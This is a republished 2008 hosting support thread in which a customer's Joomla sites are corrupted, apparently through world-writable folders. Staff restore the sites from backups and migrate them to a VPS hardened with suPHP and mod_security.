Script Attack by Bot for Joomla
- Category: JOOMLA, Integration, Security
- Published: Saturday, 22 November 2008 09:22
- Written by Super User
- Hits: 21853
i look at my website hotel-a-to-z.com and i see that there is an error in the script while all was ok last time I checked the site and I did NOT make any modification. The script was changed, probably during a server rewrite and it apparently happenend 1 week ago as per my stats.
Now I do now know what wrong exactly with the script, but it is not the first time that it happens since I have started working with you.
Now I am not a programmer and I can't even access my "admin" in order to re-install the modified module.
Please advise and please tell me what went wrong.
Kindly
Matthieu
Posted On: 24 Feb 2008 04:38 AM
Hi,
What script are you having problems with?
Best regards,
Posted On: 24 Feb 2008 04:42 AM
Hi,
well... all was ok last week when i checked.
now when i try to open the main url i get the message: Parse error: syntax error, unexpected '"' in /home/hotelato/public_html/mambots/editors/fckeditor.php on line 36
i never had a problem with that and i also dont have a problem with that mambot on other sites using it...
it looks like the website just stopped working on it's own...
last confirmed successful visit is on 19/02...
I know that 3rd party extensions are not hfw responsibility, but in that case i think it's a server error ...
Kindly
Posted On: 24 Feb 2008 05:13 AM
Hi,
Your script seems to be changed. It was last modified Feb. 21st.
I've changed the scripts' first error, there were extra quotes, but from now on, you'd have to go on manually change the script line by line until you clean out all errors.
Let us know if you need furtehr assistance.
Best regards,
Posted On: 24 Feb 2008 05:32 AM
hi
that's very interesting...
do you know if it was modified by somebody or by the server?
I did not work on that site at all for about a month, maybe more (apart from normal user maintenance)
If you tell me that it was modified by a third party then I will have to think that somebody got hold of my password
Kindly
Posted On: 24 Feb 2008 05:48 AM
ticket update:
I wish I could be able to correct that file but in any case it seems that i I can't save it (if it's been re-written by the server, server has also changed the file ownership to "nobody"
Also...
please tell me why this happens and how I can prevent it in the future
Kindly
Posted On: 24 Feb 2008 06:15 AM
Hi,
It is hard to say who or what had changed the file.
The mambo is exploitable but unfortunately, we cannot ensure that the site is safe, you should do that. I've changed the ownership of the file so you can keep working on the file.
Best regards,
Posted On: 24 Feb 2008 06:48 AM
Hi,
Thanks for that your help
I understand that you have nothing to do with scripts I install
but if your server goes and changes the files (IF), then I have a problem with your services in general, regardless if it's a mambo or any other system.
Now it's the second time that I notice random script changing while I'm absolutely sure that I have not touched them.
This is where I stand
Kindly
Posted On: 24 Feb 2008 06:58 AM
Hi,
server can't overwrite the file itself, if your file was changed and with ownership set to nobody, than this is done through apache with a script, either any one of your other scripts that are maybe writing to that file or an exploit was used if the file sits in world writable folder or itself has world writable permissions (777).
And I can see that folder mambots indeed has 777 permissions on it, and thus anyone can basically write to it or use exploits that can modify your files.
Please let us know if you need any further assistance.
Posted On: 24 Feb 2008 07:37 AM
thank you very much for specifications
I'll look into that further.
(I ever had some hfw support telling me that it happens that the sever rewrites files and makes mistakes though... i dont invent that, you can look in my support archives if you want)
Kindly
Posted On: 24 Feb 2008 07:39 AM
by the way that file is 644
Posted On: 24 Feb 2008 07:40 AM
Hi,
you're welcome, please let us know if you need any further assistance.
Posted On: 24 Feb 2008 07:47 AM
sure thing
and next time that happens I'll have to change hosting company
Kindly
Posted On: 24 Feb 2008 07:52 AM
Hi,
> by the way that file is 644
It does not matter if the file has 644 permission if the folder in which it is has 777 writable permissions.
Please let us know if you need any further assistance.
Posted On: 24 Feb 2008 07:54 AM
are you telling me that a file on 644 in a folder on 777 will not be 644 anymore but 777 itself?
S.
Posted On: 24 Feb 2008 07:56 AM
Hi,
no, but the file can be easily replaced or modified through web server by an exploit script.
Please let us know if you have any further questions.
Posted On: 24 Feb 2008 08:05 AM
And you think that this is the case here?
do you mean another script on that website would have come and updtated that script?
in that case, as far as I know, there is none...
this is just a small website with a text editor and a link directory...
I dont think there is anything that goes around and changes scripts...
sorry to bug you, i'm developping a bigger project at the moment and it is using the same cms so I really need to clear this kind of risks to happen again on other websites.
If that is a problem coming form your server rewriting shared accounts and that you tell me that it can't happen the day I upgrade to VPS, that will clear my doubts, if not I must inquire more.
Kinldy
Matthieu
Posted On: 24 Feb 2008 08:11 AM
Hi,
If none of your scripts changed it that it got changed by some exploit script, you see since the folder has 777 permissions basically anyone can write, change, remove or replace files in it.
However there is a solution to this, it is called suPHP, with suPHP enabled all scripts will be running in apache as exact account username and not with nobody user, so you would not need to have 777 permission on folder, or better with suPHP you can't have 777 permissions at all as it would not work, you would have to have all folders on 755 and files on 644.
However suPHP is not available on our shared servers, but it can be installed on our VPS or dedicated servers.
Please let us know if you have any further questions.
Posted On: 24 Feb 2008 08:42 AM
That is a great support reply
thanks so much
Kindly
Matthieu
Posted On: 24 Feb 2008 08:47 AM
Hi,
you're welcome, please let us know if you have any further questions.
Posted On: 24 Feb 2008 02:08 PM
hi again,
unfortunately i seem to be unable to correct all the parsing errors that appeared in that page.
strangely, when I look in that same file on other systems, it is exactly the same which means that the modifications where made to another file that prevent this one to work as it did before... so anyway, even if I could correct all the errors, I will still not know why the problem came up...
I dont know if it is possible to reload a backup that'd be more than 1 week old but then to load only the public_html content but not the database.
If you have such backup and if it's possible to reload only files, please do so.
If not please put the backup in my directory and I'll download it, then i'll ftp the files
and if there's no such backups... then... i'm in trouble ^_^
Please advise
Kindly
Posted On: 24 Feb 2008 02:27 PM
Greetings,
Here are the 3 available backups for user hotelato :
- Feb 24 07:17
- Feb 15 08:29
- Jan 19 07:15
Please do not hesitate to contact us if you need further information.
Sincerely,
Posted On: 24 Feb 2008 02:50 PM
Hi,
Thanks for your reply
the backup of Feb 15 08:29 would do
in that case you could also reload the whole backup, inclusive of the database.
Thanks a lot
Matthieu
Posted On: 24 Feb 2008 02:55 PM
Greetings,
I am restoring the backup as requested.
Please allow from 10 to 15 minutes for the restore.
Please do not hesitate to contact us if you need further information.
Sincerely,
Posted On: 24 Feb 2008 03:07 PM
Hi,
It is all back to normal now... which proves that my script has been corrupt for unknown reasons... maybe by somebody who discovered my password... or not... I guess I'll never know.
Thanks for your help anyway
Kindly
Matthieu
Posted On: 24 Feb 2008 03:46 PM
Hello,
Our pleasure, let us know if there is anything further we can do for you.
Posted On: 25 Feb 2008 12:18 AM
hi,
sorry...
that problem with scripts stopping to work just happened again on another webiste.
I's a joomla again, so not directly your problem again...
but i start to think that Im' being victim of som kind of organised hack
is there any course of action you can recommend if I want to identify the source of this trouble?
Kindly
Matthieu
Posted On: 25 Feb 2008 12:22 AM
Hello,
Which site isn't functioning currently? Can you provide a URL or filesystem path so that we can test?
Best Regards,
Posted On: 25 Feb 2008 12:47 AM
hi,
thanks for your care... but once again it's to do with third party extensions... :(
I'm trying to find out on my side as well and I've corrected an error already (I saw more)
but what I've corrected makes me think much...
I've corrected the follwing line:
$jrConfig['offendingelements']='> < & - , . ; : ) ( ? ! { } [ ] / ' ';
to
$jrConfig['offendingelements']='> < & - , . ; : ) ( ? ! { } [ ] / ';
(see the trailing ' ' ... I don't know if that was there before but could well have been and didnt' cause problem. I'm not sure how I could re-install this extension to check whether that file was originally bearing '' instead of ' because it comes with a license and i dont' have a local server yet. I'll find a way soon)
now I see other error messages on modules:
pat-Error No closing tag for pattemplate:tmpl found in srch.html on line 24
all that is happening on website:
www.securehotelbooking.com and so far on a joomla component called com_jomres
the file I corrected already is /com_jomres/site_config.php
you can access that extension by cliking "booking" on the main url
and other components appear to have problems too such as joomlaXplorer...
could it be there's beed some server upgrade the past few days?
Thanks if you have time to look around and please tell me if you need some passwords for it.
Kindly
Posted On: 25 Feb 2008 01:06 AM
Hello,
Are the files that contain errors written out by the scripts in question (ie, they're not uploaded, but written and/or modified by the scripts themselves)? It almost seems to be an error due to magic_quotes()/addslashes() handling.
Posted On: 25 Feb 2008 01:25 AM
hello,
No, all files were written at install by a remoted ioncube coded installer. (some modules were later added by standard joomla install, but not the config file in question)
the file I modified is a config file and is accessed only by ftp or admin login (as far as I know)
I'm not sure how that is related with what happened with the other website (hotel-a-to-z.com) but reloading the backups was successful, so I guess it's really somebody injecting or replacing some php files here and there.
"It almost seems to be an error due to magic_quotes()/addslashes() handling"I don't know waht that is but is that related to a particular extension or is it a general server feature?KindlyMatthieu
Posted On: 25 Feb 2008 01:33 AM
Hello,
Both sets of problems seem to be related to unescaped characters, such as ' within a single quote block (adding a \ before the second to last ' in the example you quoted would fix it also, for instance). If seems like a parsing error, as if the files were rewritten without the required escapes, which is curious.
Posted On: 25 Feb 2008 02:08 AM
Hi,
thanks for your help.
Actually I don't think that thre is anything that rewrites files on any of the websites in question.
What do you think rewrites the files?
Kindly
Posted On: 25 Feb 2008 02:10 AM
Hello,
What was the name of the file you mentioned was previously modified?
Posted On: 25 Feb 2008 02:16 AM
well...
today I noticed problems on www.securehotelbooking.com
the file I corrected already is /com_jomres/site_config.php
Before we reloaded the backup I had problems with www.hotel-a-to-z/mambots/fckeditor.php where many " " were added everywhere.... and i dont know what other files were affected because we just reloaded a backup.
Kindly
Posted On: 25 Feb 2008 02:24 AM
Hello,
Still looking into this. Do you have a pre-backup copy of this file? The file was restored was OK in both cases?
Best Regards,
Posted On: 25 Feb 2008 02:29 AM
hotel-a-to-z.com, full backup restore was successful
securehotelbooking, no restore done yet, i want to find out what it's about first... (if you can fetch the file in a backup, i'd say that a 5 days old backup would be enough to check that out... i'll download it now)
Posted On: 25 Feb 2008 02:32 AM
please tell me what are the dates of the available backups
Posted On: 25 Feb 2008 02:37 AM
Hello,
The two files are indeed different: the newer version is missing indentation as well as escapes on the ' character, etc, while the second one has indentation on the first few lines and the strings are all properly escaped. It's as if the file were read in, updated, and exported again but the new values weren't escaped properly when written. What's strange, however, is there weren't any other modifications to the file that would be considered malicious. Was an update run on this code recently?
Best Regards,
Posted On: 25 Feb 2008 02:42 AM
not that I know of...
i looked at this website 4 days ago and it was all good...
then I travelled and looked again today to see it down...
it was the same with the other webiste...
i have other websites apparently affected but I have not yet time to checked what it was about and i don't know the last time I looked at them for they are testing websites such as: http://www.hotel-web-designer.com/ or www.rootshosting.net but there is not error message... main page is just blank
Kindly
Matthieu
Posted On: 25 Feb 2008 02:50 AM
Hello,
Moving this to level 3 so we can investigate this further.
Posted On: 25 Feb 2008 05:03 AM
Matthieu,
I've restore public_html for http://rootshosting.net/ from backup and site start work. If all correct we could restore and other from backup too.
Posted On: 26 Feb 2008 12:31 AM
Hi,
Sorry for late reply, I was actually waiting for the usual mail but didnt get it this time.
Yes, I saw that you restored backup for rootshosting.net and it's ok now
you can restore backup for securehotelbooking.com and hotel-web-designer.com, but then we'll never know what happened and how to prevent it in the future.
Or maybe you have already found out.
Kindly
Matthieu
Ilya O.
Posted On: 26 Feb 2008 02:54 AM
Hi,
Both sites was restored from backups:
-rw------- 1 root root 20275009 Feb 15 08:39 hotelboo.tar.gz
-rw------- 1 root root 3858988 Feb 15 08:31 hotelweb.tar.gz
Please check that sites work.
Posted On: 26 Feb 2008 12:07 PM
Hi,
Yes, websites work, thanks a lot.
Could you identify what happened?
Is it a server rewrite that went wrong?
I think it'd be good if you keep somewhere all the backups for that day (15/02) just in case some other websites have been affected and I didnt notice.
Thanks a lot
Matthieu
Posted On: 26 Feb 2008 12:26 PM
I see that was modify many files (Feb 21). Our server dont make any modufication/updates automatic.
You could compare previous(public_html.orig) and and current(public_html) folders where you site.
drwxr-x--- 15 hotelweb nobody 4096 Feb 26 02:48 public_html/
drwxr-x--- 15 hotelweb nobody 4096 Dec 3 11:59 public_html.orig/
URGENT!!!
Hi,
I just got a major issue with a website again
it happened no more than 30mn ago
on website www.rayonghomeandland.com
it looks like my whole database has been reloaded / changed to an earlier backup
not by me
i was not even logged in cpanel when that happened
As per your last ticket reply, please note that i did not modify these files on Feb 21
Something is going very wrong. very very wrong
There must be some heavy attack all over my websites or your server is down.
This proves that I'm facing a critical point. It can't go on any longer
Please tell me what I should do
Kindly
Posted On: 27 Feb 2008 01:21 AM
please tell me available backups for this website...
do you have some backup that's from a couple of hours ago?
It might save many hours of work
Thanks
Matthieu
Erik R.
Posted On: 27 Feb 2008 02:14 AM
Hello,
There do not appear to be recent backups for user ID homeandl. I'm not certain why: is this a new domain or one that was recently migrated? What was changed in the database exactly?
Best Regards,
Posted On: 27 Feb 2008 02:38 AM
Hi,
Thanks for reply, i'm panicking here.
I created this website yesterday, I was just hoping that they'd been an overnight backup.
the person I make the website for came to visit, i was actually working on it and all was ok.
I might have been logged in cpanel but not active there, certainly not in fantastico or in db menus or in mysql... just on main cpanel home page.
I opened my laptop and connected to the website and it opened but strangely displayed the wrong template.
when i looked the whole database was replaced by the first install of the cms, all my work gone.
there is nothing on this website that has access to db backup or restore... and the install comes from fantastico...
There must be a record of some db reload or or something...
what can have happened??????
and that's starting to be regular on all my websites... and that one is just new
plz help
Posted On: 27 Feb 2008 02:47 AM
Hello,
Checking the cPanel logs to see if there are any records of accesses to this DB. MySQL itself does not keep logs of DB reloads or other queries unforuntately. If the account was just created this explains the lack of backup. It's possible the application itself was the cause of the reset. We'll update you once the log search is complete.
Best Regards,
Posted On: 27 Feb 2008 03:08 AM
hi, sorry to interrupt, but i need to know in order to understand what's hitting me:
Posted On: 26 Feb 2008 12:26 PM
I see that was modify many files (Feb 21). Our server dont make any modufication/updates automatic. "
please tell me files modified and time that they were modified (that will help me find out if it was man made or bot/server made)
also several websites have been forced modified that day, it'd be nice to see which one at what time and who was logged on each time it happened.
(I know a guy who'd like to see me have problems with my websites, so it's very important for me to know the origine genre)
Thanks if you can find that out
Posted On: 27 Feb 2008 03:52 AM
Hello,
The available access logs indicates several install/uninstalls involving this DB via cPanel. These were done from IP 125.27.91.236 logged in as homeandl:
125.27.75.59 - homeandl [02/26/2008:12:43:09 -0000] "GET /frontend/rvblue/fantastico/autoinstalljoomlado.php
125.27.75.59 - homeandl [02/26/2008:12:46:55 -0000] "GET /frontend/rvblue/fantastico/autoinstallhome.php
125.27.75.59 - homeandl [02/26/2008:12:50:56 -0000] "GET /frontend/rvblue/fantastico/autoinstallremoveconfirm.php
125.27.75.59 - homeandl [02/26/2008:12:52:15 -0000] "GET /frontend/rvblue/fantastico/autoinstallremovedo.php
125.27.75.59 - homeandl [02/26/2008:12:52:42 -0000] "GET /frontend/rvblue/fantastico/autoinstallhome.php
125.27.75.59 - homeandl [02/26/2008:12:58:12 -0000] "GET /frontend/rvblue/fantastico/autoinstalljoomlado.php
125.27.91.236 - - [02/27/2008:06:31:10 -0000] "GET /frontend/rvblue/fantastico/autoinstalljoomlado.php
125.27.91.236 - homeandl [02/27/2008:06:32:05 -0000] "GET /frontend/rvblue/fantastico/styles.css HTTP/1.1" 200 0 "http://www.rayonghomeandland.com:2082/frontend/rvblue/fantastico/autoinstalljoomlado.php
125.27.91.236 - homeandl [02/27/2008:06:32:07 -0000] "GET /frontend/rvblue/fantastico/autoinstalljoomlado.php
Best Regards,
Posted On: 27 Feb 2008 04:02 AM
Hi,
thanks for that.
very very interesting.
absolutely only me knows how to connect to this cpanel as per now.
I was probably logged on.
I did absolutely not perform these tasks and know of no script that can do that.
I must find the problem but I'm puzzled with your last post.
Is there a way that I can afford more support from you to look into this matter? It is a very critical issue for me, and now is the wrong time (as usual).
What should be my next step please.
Kindly
Posted On: 27 Feb 2008 04:04 AM
0_o
could somebody have full access of my browsers and operate cpanel from remote???????
and my pc's kind of clean...
Posted On: 27 Feb 2008 04:19 AM
CORRECTION
I just see that the date of what you showed me is yesterday, not today
yes, it's me who did that.
I installed these things
sorry
so back to my problem... today, not yesterday, the database of that installed, which had been updated much already, has been replaced by the database of a fresh install.
files don't appear to have change
but the whole database is the joomla default db
sorry for date misunderstanding... i got confused by the time difference
so now my problem is... how can files change at random like last week and how can my database be completely replaced by a fresh joomla one.... just like that...
I must solve these occurences and if you find out the problem and that i need to upgrade or to pay a fix fee for the service, please let me know.
It's a must for me at this point
Kindly
Matthieu
Matthieu Lagier
Posted On: 27 Feb 2008 04:23 AM
0_o
or is it possible that my browser just reloaded the cache of the joomla install page and re-installed it when I logged in again...?
and even unprobable, that would not expain last week's incidents
so confusing
Kindly
Posted On: 27 Feb 2008 04:27 AM
Hello,
The only logs today appear to be an install here:
125.27.91.236 - homeandl [02/27/2008:06:32:07 -0000] "GET /frontend/rvblue/fantastico/autoinstalljoomlado.php"
It is possibl that refreshing or reloading the install form would produce this result. I don't see any accesses other than through IPs in your range, so that is a possibility. Access to those DBs can be made many other ways though (ie, through the scripts themselves, command line mysql or phpMyAdmin). In this case, though I think the DB may simply have been accidentally reloaded.
Best Regards,
Posted On: 27 Feb 2008 04:50 AM
You are very right, I had just thought of that. I'm shameful to be so stupid... i did open the pc on which i installed the joomla last night.
it does not change the fact that I want to solve last week's cases which I'm positive happened on webistes I had not touched in weeks.
my wrong so I pay for having so little control over my things.
earlier on this ticket is mentionned about:
Posted On: 24 Feb 2008 08:11 AM
Hi,
If none of your scripts changed it that it got changed by some exploit script, you see since the folder has 777 permissions basically anyone can write, change, remove or replace files in it.
However there is a solution to this, it is called suPHP, with suPHP enabled all scripts will be running in apache as exact account username and not with nobody user, so you would not need to have 777 permission on folder, or better with suPHP you can't have 777 permissions at all as it would not work, you would have to have all folders on 755 and files on 644.
However suPHP is not available on our shared servers, but it can be installed on our VPS or dedicated servers."
I wanted to upgrade to vps in 6 months so i was basically saving 200$
in view of last week events and my dumb panick of today, would hfw agree to step over the line and fix me with a well secured vps + list of advise and I buy the vps now and spend these 200$
last week events were of different nature and probably due to some script injection of some sort...
and so I pay for disturbing you for nothing today... and I feel safer.
If you think something like that is possible (that is that your team actually does the things to secure my vps system too), I'd be standing by to purchase 1 year vps now.
Please keep me posted, and in any case i'm sorry for today's panick
Kindly
Posted On: 27 Feb 2008 05:10 AM
Hello,
Well, it appears all of the files that were modified were either world-writeable or owned by nobody (the UID the web server runs under), which means it's entirely possible the files could be written to by an exploited scripted on the server. This seems the most likely explanation at this stage, although it's a very curious set of changes that were made to your files. All the errors appear to have been due to quoting problems (unescaped single quotes, etc) and no other malicious code appears to have been written.
We can certainly upgrade you to a VPS. The benefit there is that you have greater flexibility in deploying a custom configuration, such as the use of suPHP, as well as the added benefit of being isolated from all other users complete. If you would like to upgrade, we can certainly set you up with the latest Apache/PHP/suPHP/mod_security and patches prior to migrating you over.
Best Regards,
Posted On: 27 Feb 2008 06:04 AM
Hi again.
yes, please fix me up with security systems and necessary settings on vps and the list of actions to take and things to not do on my side to insure maximum possible security.
Should I go and purchase it now? or should I wait for you to prepare things first?
Kindly
Posted On: 27 Feb 2008 06:56 AM
Hello,
You can proceed with a VPS order here:
https://secure.hostforweb.com/order/step1.php?service=vps
Once your server is provisioned, you need only reply back to this ticket and we'll proceed with your server setup, then have our migration team pull your data over from your existing account.
Posted On: 27 Feb 2008 07:09 AM
hi again
order's been placed.
also, i did not yet place order for the SSL, I want to know: my main domain is rootshosting.net, but it's ok to make an ssl for securehotelbooking.com in the future, even if it's not main account... right?
Until when can I continue to work on my websites before iit will be locked for transfer please?
Kindly
Posted On: 27 Feb 2008 07:20 AM
Hello,
Yes, you can place SSL on any of your domains at any time, there's no restriction there. Your sites will all remain live on the current server until after your data is migrated. Both sets of accounts will actually run simultaneously for a while so you can verify everything transferred correctly. Once you're ready, it's just a matter of switching your DNS to the new IPs that will be assigned to your VPS.
Best Regards,
Posted On: 28 Feb 2008 11:50 AM
hi,
sorry to interrupt...
what's the next step with the VPS upgrade?
but are you waiting for a sign for me or is it me who's waiting for a sign for you?
because I have received no news since yesterday. Not that I'm in a hurry at all, but I thought that maybe somebody is waiting for me to action something.
Kindly
Matthieu
Posted On: 28 Feb 2008 12:32 PM
Hello,
Here is the URL to upgrade your VPS server:
https://secure.hostforweb.com/order/vpsaddon.php
Thank You.
Posted On: 28 Feb 2008 01:37 PM
Hi,
Thanks for reply
I already did that yesterday and proceeded to payement.
I was told to come back here and post that it was done in order to have it setup as per detailed in this ticket; and so I did.
but nothing happened and nobody contacted me back.
Kindly
Matthieu
Max P.
Posted On: 28 Feb 2008 01:42 PM
Please provide us with the following to generate your CSR. Also, make sure that the domain you want an SSL for is assigned a static/dedicated IP address.
Email Address the Cert will be sent to:
Host to make cert for(usually www.yourdomain.com):
Username:
IP Address:
State:
City:
Country(2 Letter Abbreviation):
Company Name:
Company Division:
Email:
Password:
Address and Zipcode:
Posted On: 28 Feb 2008 01:53 PM
hi, sorry, you don't understand.
I did not request ssl now.
vps was supposed to be setup with additional security features as per:
"We can certainly upgrade you to a VPS. The benefit there is that you have greater flexibility in deploying a custom configuration, such as the use of suPHP, as well as the added benefit of being isolated from all other users complete. If you would like to upgrade, we can certainly set you up with the latest Apache/PHP/suPHP/mod_security and patches prior to migrating you over.
Best Regards,
Erik R.
HostForWeb Support
Matthieu Lagier
Posted On: 27 Feb 2008 06:04 AM
Hi again.
yes, please fix me up with security systems and necessary settings on vps and the list of actions to take and things to not do on my side to insure maximum possible security.
Should I go and purchase it now? or should I wait for you to prepare things first?
Kindly
Posted On: 27 Feb 2008 06:56 AM
Hello,
You can proceed with a VPS order here: .... "
so I proceeded order and now I'm waiting for the VPS with secure setup...
Thanks
Posted On: 28 Feb 2008 02:05 PM
Hello,
I see, you need to purchase new VPS server and request additional features through support request.
Thank You.
Posted On: 28 Feb 2008 02:08 PM
sorry, please confirm:
I already placed an order yesterday, should I place that order one more time?
thanks
Matthieu
Max P.
Posted On: 28 Feb 2008 02:21 PM
Hello,
WHat is the main domain name pleasE?
Posted On: 28 Feb 2008 02:27 PM
rootshosting.net
Posted On: 28 Feb 2008 02:33 PM
Hello,
Yes, you have to resubmit the form since you put invalid billing info.
Posted On: 28 Feb 2008 02:37 PM
hi again,
i've done it again.
I hope I filled in the right information this time
Please let me know what's next
Thanks a lot
Posted On: 28 Feb 2008 02:42 PM
Hello,
YUou've ubmited addon form. You should submit a new account order.
Posted On: 28 Feb 2008 02:46 PM
Hi,
I've just re-filled the VPS addon form again
if it's still not good, then there's something I don't understand
Kindly
Posted On: 28 Feb 2008 02:51 PM
You submited wrong form again.
https://secure.hostforweb.com/order/step1.php?service=vps
Posted On: 28 Feb 2008 03:14 PM
hi again,
So my VPS has just been setup.
Now how can I get the security setup that was "promised" do me?
or was that done already?
Kindly
Posted On: 28 Feb 2008 04:16 PM
hi again,
This post relates to previous post of this ticket, regarding all these pages of which the script was changed.
going around I just noticed that several other websites have been affected and pages dont work anymore.
could it be possible to reload the backup of - Feb 15 08:29 but only for websites: rootsreggaeclub.com / hotel-montpaisible.ch / hotel-crans-montana.ch / hotelcransmontana.com / bookhostelbook.com / reggaecollective.com / please.
Sorry again for all this bother but that's really a big thing that hit me there... I hope my upgrade to vps will prevent this kind of attack in the future.
Please keep me posted
Kindly
Posted On: 28 Feb 2008 05:00 PM
Hello,
Can you tell us which sites have been affected? Can you tell us more about the issue, so we could reproduce it?
Thank you.
Best regards,
Vital
Posted On: 29 Feb 2008 12:12 AM
hi,
there's a long post of question marks about that already...
about the 21st of this month about 6 of my websites went down.
my best explanation so far is that some kind of bot came around and modified slightly slightly many files that were now well protected (chmod 777 or in a 777 folder for all files changed aS faR aS I knoW).
All sites affected are using joomla but some other scripts could be affected... i can't know because 95% of my scripts are joomla based.
And I know only how to know joomla, si I've upgraded to VPS hoping that your team will able to secure my environnement better.
That's all I can say about that incident and thanks a lot to be interested in my misery ^_^
Kindly
Posted On: 29 Feb 2008 01:03 AM
Hello,
Upgrade to VPS really helps to make your sites more secure: as you can install addltional security modules, do additional tweaks, etc.
However, VPS in not a panacea, and if you use web-scripts full of security holes than they'll be hacked.
Best regards,
Posted On: 29 Feb 2008 01:14 AM
Hi,
Are you advising against the use of joomla in general? (I mean... is that what you call a script full of security holes?)
Kindly
Posted On: 29 Feb 2008 01:16 AM
Hello,
Joomla doesn't have the best track record in this regard, but, part of the issue is that on shared servers it requires many world-writeable files which manes non-Joomla scripts that are exploitable are also able to write to these files. With suPHP, you can run a more secure Joomla setup, but you'd still need to keep on top of the latest security patches from the script vendor.
Best Regards,
Posted On: 29 Feb 2008 01:23 AM
Thanks a lot.
I'm looking around vps now and I got to say that it will take time for me to get used to it.
Is suPHP already installed?
that'd be nice if you cold make a list of the things I got to learn about / install / do / configure ... so that I know where to head to secure my thing.
I'll find tutorial about it and ask around... but I'd feel more comfortable if you took 5mn to write a list of advise for me and I'll use it as my master plan to secure my site...
... that'd be a priceless list of things to do and learn for me... and probably less use of support in the future :P
Kindly
Posted On: 29 Feb 2008 01:30 AM
Hello,
I'm not sure if it is. What's your VPS main IP and root password? If suPHP hasn't been installed, I can configure this for you now, as well as mod_security, etc, if these aren't there.
Best Regards,
Posted On: 29 Feb 2008 01:34 AM
That'd be great...
Posted On: 29 Feb 2008 01:49 AM
Hello,
Thanks, perfect. I'll go ahead with building the latest httpd/PHP from our builder with our custom security patches, install suPHP, mod_security. I'll also configure your mail server for better RBLs and update SpamAssassin for better spam protection. I'll update you on this and your other questions once this all set.
Best Regards,
Posted On: 29 Feb 2008 04:47 AM
Hello,
Just to update: httpd, PHP built to latest versions. mod_security is installed. WHM configured for bruteforce protection. Working on suPHP for you still.
Best Regards,
Posted On: 29 Feb 2008 06:12 AM
Hello,
mod_suphp is installed. Do you have an account you'd like to create or that we can migrate now so that I can test this working normally?
Best Regards,
Posted On: 29 Feb 2008 06:36 AM
hello,
sorry but i'm not sure exactly on what account' I'm working now... I already logged in the VPS through virtuozzo and try to figure out what it's about.
I couldn't access my new WHM though....
so when you talk about migrating an account, I'm not sure what you mean because I'm not sure what's on the other side (the new VPS).
please do anything you want as long as I don't lose data really ^_^
It would be nice to make a general backup of all websites at this exact time though (and to also keep the backup of the 16/02 in order to keep a version of before the "attack(?)"
Thanks a lot
Kindly
Matthieu
Posted On: 29 Feb 2008 06:39 AM
Hello,
Well, your accounts are currently still hosted on the shared account. We can start to move accounts over, but I'd suggest moving one first so that we can test everything is working well, then have our migration team port everything. Once this is done, you simply need to update your DNS for the new IPs.
Best Regards,
Posted On: 29 Feb 2008 06:45 AM
okay,
well... earlier I asked to reload backup of 16/02 for several urls (rootsreggaeclub.com / bookhostlbook.com / hotel-montpaisible.ch / hotelcransmontana.com and hotel-crans-montana.ch)
maybe it'd be wise to restore these backups first because the scripts are corrupt after 21st while I made minor updates on them.
and then you could try the transfer with rootsreggaeclub.com (but now it's not working 100% until restore)
Kindly
Matthieu
Posted On: 29 Feb 2008 08:59 AM
Hello,
The following backups are available for these domains:
/backup/cpbackup/daily/reggae.tar.gz Thu Feb 28 01:47:35 2008
/backup/cpbackup/monthly/reggae.tar.gz Sun Jan 20 01:56:21 2008
/backup/cpbackup/weekly/reggae.tar.gz Sat Feb 16 01:56:17 2008
/backup/cpbackup/daily/hotelmon.tar.gz Tue Feb 26 22:32:38 2008
/backup/cpbackup/monthly/hotelmon.tar.gz Sat Jan 19 07:12:30 2008
/backup/cpbackup/weekly/hotelmon.tar.gz Fri Feb 15 08:13:15 2008
Which would you like restored?
Best Regards,
Matthieu Lagier
Posted On: 29 Feb 2008 09:15 AM
Hi,
Please reload:
/backup/cpbackup/weekly/hotelmon.tar.gz Fri Feb 15 08:13:15 2008
/backup/cpbackup/weekly/reggae.tar.gz Sat Feb 16 01:56:17 2008
isnt' there anything for hotelcransmontana.com and hotel-crans-montana.com and hotelcransmontana.ch? if yes the last backup before the 21st/02 will do
Thanks a lot
Kindly
Erik R.
Posted On: 29 Feb 2008 09:27 AM
Hello,
I couldn't locate these accounts? What usernames do they belong to?
Best Regards,
Posted On: 29 Feb 2008 09:29 AM
hotelcra and hotelcom
sorry if I mixed them up
Matthieu
Posted On: 29 Feb 2008 06:29 PM
Hello,
I've restored these to your VPS:
/backup/cpbackup/weekly/hotelmon.tar.gz Fri Feb 15 08:13:15 2008
/backup/cpbackup/weekly/reggae.tar.gz Sat Feb 16 01:56:17 2008
We have these backups which you asked for as well;
-rw------- 1 root root 2.4M Feb 15 08:12 hotelcra.tar.gz
-rw------- 1 root root 8.2M Feb 15 08:34 hotelcom.tar.gz
Would you like those restored as well? Or would like us to move this to migration and have them move all your accounts over to the VPS?
Regards,
Posted On: 01 Mar 2008 12:36 AM
Good Morning,
Yes please you can reload these backups
Thanks a lot
Kindly
Posted On: 01 Mar 2008 07:33 AM
Matthieu,
it seems that those two accounts are already in your VPS WHM, should we overwrite them with backups from the shared server anyway?
Best regards,
Posted On: 01 Mar 2008 08:48 AM
yes please
thanks
Posted On: 01 Mar 2008 09:08 AM
Matthieu,
in progress, please hold on.
Best regards,
Posted On: 01 Mar 2008 09:12 AM
done. Are there any more accounts you need restored or moved over to VPS?
Best regards,
Posted On: 01 Mar 2008 09:16 AM
hi,
are you sure that the backup of 15/02 was restored for hotel-montpaisible.ch and hotel-crans-montana.com?
or have they been reloaded only on the vps and not online?
I'm not sure... how can I see what the vps shows and what the old account shows?
Posted On: 01 Mar 2008 10:11 AM
Greetings,
You could view old sites on shared server using:
http://philadelphia.hostforweb.net/~hotelcom/
and
http://philadelphia.hostforweb.net/~hotelmon/
hotel-montpaisible.ch and hotel-crans-montana.com are opening from VPS.
Best regards,
Posted On: 01 Mar 2008 10:17 AM
hi,
thanks for the information,
it appears that both versions are corrupt...
have the backups of 15/02 been loaded?
if yes already... then forget it, all can be transferred and I'll look around to see if there's a problem...
please keep all available backup so I can reload some in case
Thanks
Posted On: 01 Mar 2008 10:23 AM
Greetings,
Yes, sites was restored from backups of 15.02.
Best regards,
Posted On: 01 Mar 2008 10:38 AM
hi,
This is very worrying... it shows me that these sites were attacked before the 21st when the others went down... and if they have been the first targetted... it may not be a bot after all (these sites have a story)
If I understood well, with the new vps setup (suphp and things) I won't have to run files on 777 anymore...
how does that work? what should I do? change all files and folder chmod manually? is it all going to continue working? Is there a comprehensble doc?
Thanks if u got time to answer these questions
Kindly
Posted On: 01 Mar 2008 11:15 AM
Greetings,
>>how does that work?
With mod_suphp all php scripts running with account UID and GID.
>>what should I do?
You should keep right owner on scripts.
>>change all files and folder chmod manually?
We could set recursively right owner and chmod for files for you.
